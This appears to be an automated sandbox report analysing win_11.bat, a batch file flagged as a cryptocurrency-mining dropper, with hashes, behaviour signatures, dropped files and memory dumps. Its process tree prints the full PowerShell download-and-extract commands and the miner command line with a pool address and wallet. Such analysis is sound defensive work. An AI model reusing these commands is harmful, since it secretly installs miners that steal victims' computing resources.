Analysis

  • max time kernel
    1798s
  • max time network
    1780s
  • platform
    windows10-1703_x64
  • resource
    win10-20230621-en
  • resource tags

    arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30-06-2023 14:47

General

  • Target

    win_11.bat

  • Size

    706B

  • MD5

    ddc05c409f627a4382bff4c3a49423df

  • SHA1

    0f77ae481593bc1b0669dae7a044d0b96f39413f

  • SHA256

    6daf93d284bd5d39f613d6d3f96c083d1b99baa10e7acbf65f74ab84fe551887

  • SHA512

    0bdfacc137a0f40cfffa34d3549961fe20dc35905e14a9b5c207cab380594dff09dfe641a534fb0d3211bcce3b727801df8c7c635fbc9c0cd26d6e7914818cc3

Score
10/10
upx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 49 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_11.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1364
    • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe
      .\cpuminer-sse2.exe -a cpupower -o stratum+tcp://cpupower.eu.mine.zpool.ca:6240 -u oHyVvSQ3HDCgrM7MSJNzWmisqohcssm15C -p -c=OMEGA
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4372

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    56efdb5a0f10b5eece165de4f8c9d799

    SHA1

    fa5de7ca343b018c3bfeab692545eb544c244e16

    SHA256

    6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

    SHA512

    91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    1c13dd6d305ebb42255b5a18ab5993f7

    SHA1

    a3b0fc331de0a478ebbff869e73bf38ad68d34dd

    SHA256

    89046e3cb34f0e2bb8c56478403875eb5301c6e2ad16e5ea5a1e48aff9e73b05

    SHA512

    219c986318c21489c40a22c5125b8a11b61c5abdb1d2445c9c4f34ca6ae4419f766c288f2dc8b474159ffebf00c1c864025c32a6cee80583d26d9a0a24a53963

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkbrf4qe.irc.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt-win.zip

    Filesize

    20.9MB

    MD5

    99cc95c9ce13cf3da743e1d56dabe92d

    SHA1

    e819db3b6ad4703fbc8535dadad3ad29d3cc2039

    SHA256

    df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b

    SHA512

    932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

    Filesize

    2.6MB

    MD5

    d136eb0fdd0e7826893f332c7fc3f7a2

    SHA1

    1e7fd635278e954eb0ee8cb951d16e4ecf60592f

    SHA256

    993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

    SHA512

    895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

    Filesize

    2.6MB

    MD5

    d136eb0fdd0e7826893f332c7fc3f7a2

    SHA1

    1e7fd635278e954eb0ee8cb951d16e4ecf60592f

    SHA256

    993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

    SHA512

    895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

  • memory/372-126-0x000001B2684A0000-0x000001B268516000-memory.dmp

    Filesize

    472KB

  • memory/372-123-0x000001B2682F0000-0x000001B268312000-memory.dmp

    Filesize

    136KB

  • memory/372-122-0x000001B268270000-0x000001B268280000-memory.dmp

    Filesize

    64KB

  • memory/372-141-0x000001B268270000-0x000001B268280000-memory.dmp

    Filesize

    64KB

  • memory/372-121-0x000001B268270000-0x000001B268280000-memory.dmp

    Filesize

    64KB

  • memory/1364-170-0x0000014E45070000-0x0000014E45080000-memory.dmp

    Filesize

    64KB

  • memory/1364-171-0x0000014E45070000-0x0000014E45080000-memory.dmp

    Filesize

    64KB

  • memory/1364-189-0x0000014E451A0000-0x0000014E451B2000-memory.dmp

    Filesize

    72KB

  • memory/1364-202-0x0000014E45190000-0x0000014E4519A000-memory.dmp

    Filesize

    40KB

  • memory/1364-208-0x0000014E45070000-0x0000014E45080000-memory.dmp

    Filesize

    64KB

  • memory/4372-295-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-310-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-281-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-282-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-283-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-284-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-285-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-287-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-288-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-289-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-291-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-292-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-293-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-294-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-279-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-296-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-298-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-301-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-302-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-305-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-307-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-308-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-309-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-280-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-311-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-312-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-313-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-314-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-315-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-316-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-317-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-318-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-320-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-321-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-322-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-323-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-326-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-328-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-329-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-333-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-334-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-335-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-336-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-337-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-338-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-340-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB

  • memory/4372-343-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp

    Filesize

    6.5MB